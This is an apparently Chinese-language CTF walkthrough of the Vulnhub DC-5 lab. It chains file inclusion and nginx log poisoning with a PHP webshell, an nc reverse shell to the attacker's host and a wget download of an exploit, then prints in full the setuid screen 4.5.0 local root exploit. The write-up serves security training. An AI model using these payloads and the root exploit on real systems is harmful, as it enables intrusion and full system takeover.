[Vulnhub] DC-5
下载链接:https://download.vulnhub.com/dc/DC-5.zip
同DC-4 这个靶机也是只有一个flag 不过官方描述说这个可能提高了一点点难度
官方描述:
据我所知,只有一个可利用的入口点可以进入(也没有 SSH)。这个特定的入口点可能很难识别,但它就在那里。您需要寻找一些与众不同的东西(随着页面刷新而改变的东西)。这有望为漏洞可能涉及的内容提供某种想法。
仅作记录,不涉及 phpmailer 漏洞利用。:-)
这个挑战的最终目标是获得root权限并读取唯一的flag
知识点:
- 文件包含日志注入🐎
- nc 反弹shell
- python开启http服务&wget下载文件
- suid-screen命令提权
目录
<1> 信息搜集
<2> ngnix日志注入一句话木马
<3> 反弹shell
<4> Privilege Escalation(提权)
<1> 信息搜集
扫一下靶机的ip
nmap -sP 192.168.236.0/24 扫描一下靶机ip
靶机ip: 192.168.236.135
nmap -A -p 1-65535 192.168.236.135 扫描一下靶机开放哪些服务
访问80开放的http服务查看一下有没有可利用信息
发现在我们contact一栏,提交的时候 Copyright © 2019 变为了 Copyright © 2018
使用dirsearch工具爆破目录,爆破出网站子域名,(dirb,gobuster都试了 字典不如dirsearch)
挨个访问看一下,发现访问/footer.php时会出现动态变化
thankyou.php不断刷新,下面也会发生变化。猜想thankyou.php调用footer.php,可能存在文件包含漏洞
那他会不会是通过传递参数来包含的呢,尝试?file=a 发现Copyright © 2019消失,file=footer.php 又出现,可以看见file参数存在文件包含漏洞 测试/etc/passwd 成功
<2> ngnix日志注入一句话木马
服务器为ngnix,尝试进行日志注入,写一句话木马
ngnix日志文件路径:/var/log/nginx/access.log
burp抓包,修改file参数为/var/log/nginx/access.log 更改UA头为一句话木马,
变为空白,证明一句话🐎被当成php代码执行 蚁剑链接
<3> 反弹shell
本机kali 监听4444端口
nc -lvvp 4444蚁剑打开虚拟终端
nc 192.168.236.128 -e /bin/bash 4444拿到shell之后 转为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
<4> Privilege Escalation(提权)
尝试sudo -l 发现没有信息
再尝试看看是否存在suid权限的命令
find / -user root -perm -4000 -print 2>/dev/null发现/bin/screen-4.5.0,本地提权漏洞
searchsploit screen 4.5.0 找到提权脚本
searchsploit -m 41154.sh 下载下来
python开启一个http服务,用于靶机wget下载文件
python -m http.server 1234
注:其他目录没有写入文件的权限。只能wget下载到/tmp目录下
wget http://192.168.236.128:1234/41154.sh在/tmp/目录下执行41154.sh
赋予执行权限chmod 777 41154.sh
运行41154.sh
成功提权为root权限
进入/root 拿到flag
如果不能执行的话,按照41154.sh文件里的命令 自己去编译 生成一下。也可以搞定
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include
int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell